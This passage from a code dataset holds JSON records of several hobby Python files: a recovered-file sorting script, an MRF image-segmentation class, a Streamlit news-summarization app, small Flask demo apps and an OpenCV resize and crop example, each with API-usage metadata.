"line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 97, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 113, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 128, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 214, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 224, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 229, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 230, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 235, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 245, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 247, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 275, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 325, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 342, "usage_type": "attribute"}, {"api_name": "numpy.NAN", "line_number": 348, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 362, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 376, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 379, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 383, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 386, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 390, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 394, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 398, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 400, "usage_type": "call"}]}
+{"seq_id": "36035913823", "text": "import os\nimport os.path\nimport shutil\nimport sys\nimport datetime, time, timedelta\n\ndef removeTfiles():\n # find REC -type f -name 't*.*' -delete\n print(\"hola\")\n\ndef splitExistOrReover():\n #source = sys.argv[1]\n #destination = sys.argv[2]\n source = \"/media/jroigfer/discExtern250/RECINM42020\"\n destinationDeleted = \"/media/jroigfer/temp/REC INM 2020/deleted\"\n destinationExisted = \"/media/jroigfer/temp/REC INM 2020/existed\"\n\n #while not os.path.exists(source):\n # source = raw_input('Enter a valid source directory\\n')\n #while not os.path.exists(destination):\n # destination = raw_input('Enter a valid destination directory\\n')\n\n for root, dirs, files in os.walk(source, topdown=False):\n for file in files:\n extension = os.path.splitext(file)[1][1:].upper()\n try:\n mtime = os.path.getmtime(file)\n except OSError:\n mtime = 0\n last_modified_date = datetime.datetime.fromtimestamp(mtime)\n\n time.strftime('%m/%d/%Y', time.gmtime(os.path.getmtime(file)))\n print(\"Last Modified Time 1 : \", last_modified_date)\n\n timeNow = datetime.datetime.now() - datetime.timedelta(days=7)\n if last_modified_date < timeNow:\n print(\"file \" + file + \" ORIGINAL \" + repr(last_modified_date))\n else:\n print(\"RECUPERADA \" + repr(last_modified_date))\n\n\n #modificationTime = last_modified_date.strftime('%Y-%m-%d %H:%M:%S', time.localtime(mtime))\n # print(\"Last Modified Time 2 : \", modificationTime)\n\n #shutil.copy2(os.path.join(root, file), destinationPath)\n\n# OJO - priemr se debe crear carpeta deleted existed y rep\ndef splitExistOrReover():\n #source = \"/media/jroigfer/temp/REC INM 2020\"\n source = \"/media/jroigfer/temp_part/REC2/\"\n\n #destinationDeleted = \"/media/jroigfer/temp/REC INM 2020/deleted\"\n #destinationExisted = \"/media/jroigfer/temp/REC INM 2020/existed\"\n\n destinationDeleted = source + \"deleted\"\n destinationExisted = source + \"existed\"\n destinationRepe = source + \"rep\"\n\n if not os.path.exists(source + \"/existed\"):\n os.mkdir(source + \"/existed\")\n if not os.path.exists(source + \"/deleted\"):\n os.mkdir(source + \"/deleted\")\n if not os.path.exists(source + \"/rep\"):\n os.mkdir(source + \"/rep\")\n\n countBasicFold = 0\n for addonFolder in os.listdir(source):\n print(\"fold: \" + addonFolder)\n if addonFolder == \"deleted\" or addonFolder == \"existed\" or addonFolder == \"rep\":\n countBasicFold = countBasicFold + 1\n\n if countBasicFold == 3:\n for addonFolder in os.listdir(source):\n print(\"fold: \" + addonFolder)\n if addonFolder == \"deleted\" or addonFolder == \"existed\" or addonFolder == \"rep\":\n print(\"no \" + addonFolder)\n else:\n for fileRec in os.listdir(source + \"/\" + addonFolder):\n print(\"file rec \" + addonFolder + \"/\" + fileRec)\n fileOrigComp = source + \"/\" + addonFolder + \"/\" + fileRec\n\n last_modified_date = time.gmtime(os.path.getmtime(fileOrigComp))\n last_modified_date_str = time.strftime('%d/%m/%Y', last_modified_date)\n #last_modified_date = datetime.datetime.fromtimestamp(last_modified_date)\n print(\"Last Modified Time 1 : \", last_modified_date_str)\n fileDateM = datetime.datetime.fromtimestamp(os.path.getmtime(fileOrigComp)).date()\n\n timeLastWeek = datetime.datetime.now() - datetime.timedelta(days=7)\n if fileDateM < timeLastWeek.date():\n print(\"EXIS: \" + fileRec + \" ORIGINAL \" + repr(last_modified_date))\n if not os.path.isfile(destinationExisted + \"/\" + fileRec):\n shutil.move(fileOrigComp, destinationExisted)\n else:\n shutil.move(fileOrigComp, destinationRepe)\n else:\n print(\"BORR: \" + fileRec + \" ORIGINAL \" + repr(last_modified_date))\n if not os.path.isfile(destinationDeleted + \"/\" + fileRec):\n shutil.move(fileOrigComp, destinationDeleted)\n else:\n shutil.move(fileOrigComp, destinationRepe)\n else:\n print(\"no estan las carpetas basicas!\")\n\n# OJO - priemr se debe crear carpeta deleted existed y rep\ndef organizeInYears():\n source = \"/media/jroigfer/temp_part/REC2/\"\n\n origin = source + \"existed\"\n destinationExisted = source + \"existed/years\"\n\n if not os.path.exists(destinationExisted):\n os.mkdir(destinationExisted)\n print(\"created %s\" % (destinationExisted))\n\n for fileRec in os.listdir(origin):\n if fileRec.endswith(\"years\"):\n print(\"descarted year folder\")\n else:\n fileOrigComp = origin + \"/\" + fileRec\n\n last_modified_date = time.gmtime(os.path.getmtime(fileOrigComp))\n year = time.strftime('%Y', last_modified_date)\n pathyear = destinationExisted + \"/\" + year\n\n if not os.path.exists(pathyear):\n os.mkdir(pathyear)\n print(\"created %s\" % (pathyear))\n\n print(\"move from %s to %s\" % (fileOrigComp,pathyear))\n shutil.move(fileOrigComp, pathyear)\n\nif __name__ == '__main__':\n splitExistOrReover()\n organizeInYears()", "repo_name": "jroigfer/XDrepoProject", "sub_path": "src/temp-test/reorganize_files.py", "file_name": "reorganize_files.py", "file_ext": "py", "file_size_in_byte": 5534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.walk", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 32, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.getmtime", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 64, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 67, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 73, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 78, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.getmtime", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 88, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 88, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 92, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 98, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 112, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 115, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.getmtime", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 126, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 130, "usage_type": "call"}]}
+{"seq_id": "17683372642", "text": "import numpy as np\nimport cv2 as cv\nimport copy\n\n\nclass MRF():\n def __init__(self, img, max_iter=100, num_clusters=5, init_func=None, beta=8e-4):\n self.max_iter = max_iter\n self.kernels = np.zeros(shape=(8, 3, 3))\n self.beta = beta\n #todo 标签的数量\n self.num_clusters = num_clusters\n #todo 获取其八邻域的像素值\n for i in range(9):\n if i < 4:\n self.kernels[i, i // 3, i % 3] = 1\n elif i > 4:\n self.kernels[i - 1, i // 3, i % 3] = 1\n #todo 灰度图归一化后的值\n self.img = img\n if init_func is None:\n self.labels = np.random.randint(low=1, high=num_clusters + 1, size=img.shape, dtype=np.uint8)\n\n def __call__(self):\n img = self.img.reshape((-1,))\n # todo 最外层的大循环\n for iter in range(self.max_iter):\n # todo p1的作用,大小为标签数量*图片的大小\n p1 = np.zeros(shape=(self.num_clusters, self.img.shape[0] * self.img.shape[1]))\n # todo 对每一个标签进行循环\n for cluster_idx in range(self.num_clusters):\n #todo\n temp = np.zeros(shape=(self.img.shape))\n #todo 每一个像素周围的8个标签的值,看周围的八个像素提供的标签参考\n for i in range(8):\n res = cv.filter2D(self.labels, -1, self.kernels[i, :, :])\n temp[(res == (cluster_idx + 1))] -= self.beta\n temp[(res != (cluster_idx + 1))] += self.beta\n temp = np.exp(-temp)\n #todo 标签信息被存放在p中\n p1[cluster_idx, :] = temp.reshape((-1,))\n # todo 转换成概率???\n p1 = p1 / np.sum(p1)\n # todo 如果是0也将其赋予一定的概率\n p1[p1 == 0] = 1e-3\n # todo 这里的mu为均值,sigma为方差\n mu = np.zeros(shape=(self.num_clusters,))\n sigma = np.zeros(shape=(self.num_clusters,))\n for i in range(self.num_clusters):\n # mu[i] = np.mean(self.img[self.labels == (i+1)])\n # todo 因为labels为1,2,而原来的值的范围为【0,2】\n data = self.img[self.labels == (i + 1)]\n if np.sum(data) > 0:\n mu[i] = np.mean(data)\n sigma[i] = np.var(data)\n\n else:\n mu[i] = 0\n sigma[i] = 1\n # print(sigma[i])\n # sigma[sigma == 0] = 1e-3\n #todo p2的作用是计算p(fs|ws)\n p2 = np.zeros(shape=(self.num_clusters, self.img.shape[0] * self.img.shape[1]))\n # todo 对于每一个像素\n for i in range(self.img.shape[0] * self.img.shape[1]):\n # todo 判断其标签\n for j in range(self.num_clusters):\n # print(sigma[j])\n # todo 这里计算的P(fs|Ws),先验概率,i guess so\n p2[j, i] = -np.log(np.sqrt(2 * np.pi) * sigma[j]) - (img[i] - mu[j]) ** 2 / 2 / sigma[j];\n\n self.labels = np.argmax(np.log(p1) + p2, axis=0) + 1\n self.labels = np.reshape(self.labels, self.img.shape).astype(np.uint8)\n print(\"-----------start-----------\")\n print(p1)\n print(\"-\" * 20)\n print(p2)\n print(\"----------end------------\")\n # print(\"iter {} over!\".format(iter))\n # self.show()\n # print(self.labels)\n\n def show(self):\n h, w = self.img.shape\n show_img = np.zeros(shape=(h, w, 3), dtype=np.uint8)\n show_img[self.labels == 1, :] = (0, 255, 255)\n show_img[self.labels == 2, :] = (220, 20, 60)\n show_img[self.labels == 3, :] = (65, 105, 225)\n show_img[self.labels == 4, :] = (50, 205, 50)\n # img = self.labels / (self.num_clusters) * 255\n\n cv.imshow(\"res\", show_img)\n cv.waitKey(0)\n\n\nif __name__ == \"__main__\":\n img = cv.imread(\"woman.jpg\")\n\n img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n img = img / 255.\n # img = np.random.rand(64,64)\n # img = cv.resize(img,(256,256))\n mrf = MRF(img=img, max_iter=20, num_clusters=4)\n mrf()\n mrf.show()\n # print(mrf.kernels)", "repo_name": "lxlscut/markov", "sub_path": "segmentation.py", "file_name": "segmentation.py", "file_ext": "py", "file_size_in_byte": 4338, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.zeros", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 85, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 93, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 97, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 99, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 99, "usage_type": "attribute"}]}
+{"seq_id": "41888466181", "text": "import streamlit as st\nfrom helper import get_summary, spacy_rander, fetch_news, fetch_news_links\n\n\nst.set_page_config(\n page_title=\"Data Analysis Web App\",\n page_icon=\"🧊\",\n layout=\"wide\",\n initial_sidebar_state=\"expanded\",\n menu_items={\n 'Get Help': 'https://github.com/everydaycodings/Text-Summarization-using-NLP',\n 'Report a bug': \"https://github.com/everydaycodings/Text-Summarization-using-NLP/issues/new\",\n 'About': \"# This is a header. This is an *extremely* cool app!\"\n }\n)\n\n\nst.sidebar.title(\"Text Summarization Web App\")\n\noption = [\"News Summary and Headlines\", \"Custom Text Summarization\"]\nchoice = st.sidebar.selectbox(\"Select of your choice\", options=option)\n\n\nif choice == \"Custom Text Summarization\":\n st.sidebar.markdown(\"Copy Sample Article if you want to test the web app. [[article source](https://edition.cnn.com/2022/02/14/us/new-mexico-albuquerque-stabbings/index.html)]\")\n st.sidebar.code(open(\"presentation/sample.txt\",\"r\").read())\n st.title(\"Welcome to {}\".format(choice))\n\n col1, col2 = st.columns(2)\n\n with col1:\n text = st.text_area(label=\"Enter Your Text or story\", height=350, placeholder=\"Enter Your Text or story or your article iit can be of any length\")\n \n if st.button(\"Get Summary and Headline\"):\n summary = get_summary(text)\n\n try:\n with col2:\n st.write(\"Text Summary (Summary length: {})\".format(len(summary)))\n st.code(summary)\n st.write(\"Text Headline\")\n st.code(\"Feature Comming Soon\")\n\n spacy_rander(summary)\n\n #with st.expander(\"Get Original Article Analysis\"):\n spacy_rander(text, text=\"Yes\")\n \n except NameError:\n pass\n\nif choice == \"News Summary and Headlines\":\n st.title(\"BBC News Summary\")\n\n search_query = st.text_input(\"\", placeholder=\"Enter the topic you want to search\")\n st.write(\" \")\n\n link, title, thumbnail = fetch_news_links(search_query)\n fetch_news = fetch_news(link)\n \n if link != []:\n col1, col2 = st.columns(2)\n\n with col1:\n for i in range(len(link)):\n if (i % 2) == 0:\n st.image(thumbnail[i])\n st.write(title[i])\n with st.expander(\"Read The Summary\"):\n st.write(get_summary(fetch_news[i]))\n st.markdown(\"[**Read Full Article**]({})\".format(link[i]), unsafe_allow_html=True)\n st.write(\" \")\n \n with col2:\n for i in range(len(link)):\n if (i % 2) != 0:\n st.image(thumbnail[i])\n st.write(title[i])\n with st.expander(\"Read The Summary\"):\n st.write(get_summary(fetch_news[i]))\n st.markdown(\"[**Read Full Article**]({})\".format(link[i]), unsafe_allow_html=True)\n st.write(\" \")\n \n else:\n st.info(\"No Result found for {} Please try some popular Keywords\".format(search_query))\n", "repo_name": "everydaycodings/Text-Summarization-using-NLP", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "53", "api": [{"api_name": "streamlit.set_page_config", "line_number": 5, "usage_type": "call"}, {"api_name": "streamlit.sidebar.title", "line_number": 18, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 18, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 21, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 21, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 25, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 25, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.code", "line_number": 26, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 26, "usage_type": "attribute"}, {"api_name": "streamlit.title", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 29, "usage_type": "call"}, {"api_name": "streamlit.text_area", "line_number": 32, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 34, "usage_type": "call"}, {"api_name": "helper.get_summary", "line_number": 35, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 39, "usage_type": "call"}, {"api_name": "streamlit.code", "line_number": 40, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 41, "usage_type": "call"}, {"api_name": "streamlit.code", "line_number": 42, "usage_type": "call"}, {"api_name": "helper.spacy_rander", "line_number": 44, "usage_type": "call"}, {"api_name": "helper.spacy_rander", "line_number": 47, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 53, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 55, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 56, "usage_type": "call"}, {"api_name": "helper.fetch_news_links", "line_number": 58, "usage_type": "call"}, {"api_name": "helper.fetch_news", "line_number": 59, "usage_type": "name"}, {"api_name": "streamlit.columns", "line_number": 62, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 67, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 68, "usage_type": "call"}, {"api_name": "streamlit.expander", "line_number": 69, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 70, "usage_type": "call"}, {"api_name": "helper.get_summary", "line_number": 70, "usage_type": "call"}, {"api_name": "helper.fetch_news", "line_number": 70, "usage_type": "name"}, {"api_name": "streamlit.markdown", "line_number": 71, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 72, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 77, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 78, "usage_type": "call"}, {"api_name": "streamlit.expander", "line_number": 79, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 80, "usage_type": "call"}, {"api_name": "helper.get_summary", "line_number": 80, "usage_type": "call"}, {"api_name": "helper.fetch_news", "line_number": 80, "usage_type": "name"}, {"api_name": "streamlit.markdown", "line_number": 81, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 82, "usage_type": "call"}, {"api_name": "streamlit.info", "line_number": 85, "usage_type": "call"}]}
+{"seq_id": "73710723689", "text": "from flask import Flask, render_template\napp = Flask(__name__)\n\n@app.route('/characters')\ndef characters():\n c_list = [\n {\n \"name\": \"Thanos\",\n \"image\": \"https://www.sideshowtoy.com/wp-content/uploads/2018/04/marvel-avengers-infinity-war-thanos-sixth-scale-figure-hot-toys-feature-903429-1.jpg\",\n \"link\": \"https://en.wikipedia.org/wiki/Thanos\"\n },\n {\n \"name\": \"Captain America\",\n \"image\": \"http://assets.readbrightly.com/wp-content/uploads/2016/05/captain-america-feat.jpg\",\n \"link\": \"https://en.wikipedia.org/wiki/Captain_America\"\n },\n {\n \"name\": \"Spiderman\",\n \"image\": \"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT7YdZvjUvsdf-D96Do5bDOTjZWybL1-0h-0-ET7FDcU5eSUUTV7Q\",\n \"link\": \"https://en.wikipedia.org/wiki/Spider-Man\"\n }\n ]\n return render_template(\"character_list.html\",\n character_list=c_list)\n\n@app.route('/names')\ndef names():\n name_list = [\"Huy\", \"Quoc\", \"Huong\", \"Tung\"]\n return render_template(\"name.html\",\n name_list=name_list)\n\nfood_list = [\n {\n \"name\": \"Bún riêu\",\n \"image\": \"https://tea-1.lozi.vn/v1/images/resized/bun-rieu-cua-134109-1449025952?w=960&type=o\",\n \"link\": \"https://lozi.vn/b/ngo-55-hai-ba-trung-1449025952?utm_campaign=copy\",\n \"ytid\": \"rYD0fh7L1r4\"\n },\n {\n \"name\": \"Bún đậu mắm tôm\",\n \"image\": \"https://images.foody.vn/res/g3/28879/prof/s576x330/foody-mobile-bun-dau-viet-ha-noi.jpg\",\n \"link\": \"https://www.foody.vn/ha-noi/bun-dau-viet\",\n \"ytid\": \"jWYCxomF7lo\"\n },\n {\n \"name\": \"Bún ngan\",\n \"image\": \"https://images.foody.vn/res/g70/693326/prof/s576x330/foody-mobile-22045769_11798535521-134-636431573959949453.jpg\",\n \"link\": \"https://www.foody.vn/ha-noi/ba-hang-bun-ngan-bun-tron\",\n \"ytid\": \"rHbHunacl0\"\n }\n ]\n \n@app.route('/food_items')\ndef food_items():\n return render_template(\"food.html\",\n food_list=food_list)\n\n@app.route('/food_detail/')\ndef food_detail(index):\n food = food_list[index]\n return render_template('food_detail.html',\n food = food)\n\nif __name__ == '__main__':\n app.run(debug=True)", "repo_name": "harleyng/nguyenlethanhha-webmodule-c4e24", "sub_path": "web2/class/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 2, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}]}
+{"seq_id": "2184055362", "text": "import cv2 as cv\n\nimg = cv.imread(\"../Resources/pikachu.png\")\nprint(img.shape) # (height, width) to get the size of the image\n\nimgResize = cv.resize(img,(350,300)) # (width, height) to resize the image.\nprint(imgResize.shape)\n\nimgCropped = img[50:250, 10:300] # (height, width) to crop the image\nprint(imgCropped.shape)\n\ncv.imshow(\"Original\", img)\ncv.imshow(\"Resize\", imgResize)\ncv.imshow(\"Cropped\", imgCropped)\ncv.waitKey(0)", "repo_name": "Sreythou/OpenCVPython", "sub_path": "practice/resize_crop_image.py", "file_name": "resize_crop_image.py", "file_ext": "py", "file_size_in_byte": 432, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.imread", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "15385539775", "text": "from flask import Flask, jsonify, request\r\nfrom flask_cors import CORS\r\nfrom datetime import datetime\r\nimport statistics as stats\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\n\r\ntipo_medicion = { 'sensor' : 'DS18B20', 'variable' : 'Temperatura', 'unidades' : 'Centigrados'}\r\n\r\nmediciones = [\r\n {'fecha' : '2019-08-20 15:38:43', **tipo_medicion, 'valor' : 100},\r\n {'fecha' : '2019-08-20 15:40:56', **tipo_medicion, 'valor' : 98},\r\n {'fecha' : '2019-08-20 15:41:16', **tipo_medicion, 'valor' : 101},\r\n {'fecha' : '2019-08-20 15:43:18', **tipo_medicion, 'valor' : 101}, \r\n {'fecha' : '2019-08-20 15:46:16', **tipo_medicion, 'valor' : 98}, \r\n {'fecha' : '2019-08-20 15:50:20', **tipo_medicion, 'valor' : 98}, \r\n {'fecha' : '2019-08-20 16:01:16', **tipo_medicion, 'valor' : 99},\r\n {'fecha' : '2019-08-20 16:03:18', **tipo_medicion, 'valor' : 97},\r\n {'fecha' : '2019-08-20 16:08:20', **tipo_medicion, 'valor' : 97}, \r\n {'fecha' : '2019-08-21 16:14:16', **tipo_medicion, 'valor' : 97},\r\n {'fecha' : '2019-08-21 16:23:18', **tipo_medicion, 'valor' : 97},\r\n {'fecha' : '2019-08-21 16:26:18', **tipo_medicion, 'valor' : 96}\r\n]\r\n\r\n@app.route(\"/\")\r\ndef get():\r\n return jsonify(tipo_medicion)\r\n\r\n\r\n@app.route('/mediciones', methods = ['GET'])\r\ndef getAll():\r\n return jsonify(mediciones)\r\n\r\n\r\n@app.route('/mediciones', methods = ['POST'])\r\ndef postOne():\r\n now = datetime.now()\r\n body = request.json\r\n body['fecha'] = datetime.strftime(now, '%Y-%m-%d %H:%M:%S')\r\n mediciones.append({**body, **tipo_medicion})\r\n return 